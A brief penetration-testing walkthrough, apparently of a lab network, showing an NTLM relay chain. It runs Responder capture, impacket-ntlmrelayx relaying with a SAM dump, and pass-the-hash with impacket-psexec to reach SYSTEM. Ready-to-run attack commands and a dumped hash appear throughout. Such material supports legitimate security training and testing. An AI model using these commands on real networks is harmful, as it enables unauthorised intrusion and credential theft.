NTLM Relay to SYSTEM

If SMB signing is disabled on a target, we can relay a live authentication and turn it straight into execution without a password.

Triggering the Authentication

An NTLM relay only works if something authenticates to us.

That usually happens when a user hits a UNC path, intentionally or by mistake.

\\sometypo\share

Name resolution fallbacks like LLMNR or NBT-NS make this common in real networks. Responder listens for these events and captures the authentication when it happens.

sudo responder -I eth0 -dwP

Relaying the Session

Generate a list of hosts that will accept relayed NTLM authentication.

nxc smb 10.3.10.0/24 --gen-relay-list relay_targets.txt

When the authentication hits the wire, we relay it to vulnerable targets.

sudo impacket-ntlmrelayx -tf relay_targets.txt -smb2support

This is real time. No cracking necessary.

From Relay to SYSTEM

Because the relayed user has local admin rights, the target accepts the connection. ntlmrelayx enables RemoteRegistry and dumps the local SAM.

Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4:::

We pass the hash to get a SYSTEM shell.

impacket-psexec Administrator@192.168.66.22 -hashes aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4

And get SYSTEM on CASTELBLACK.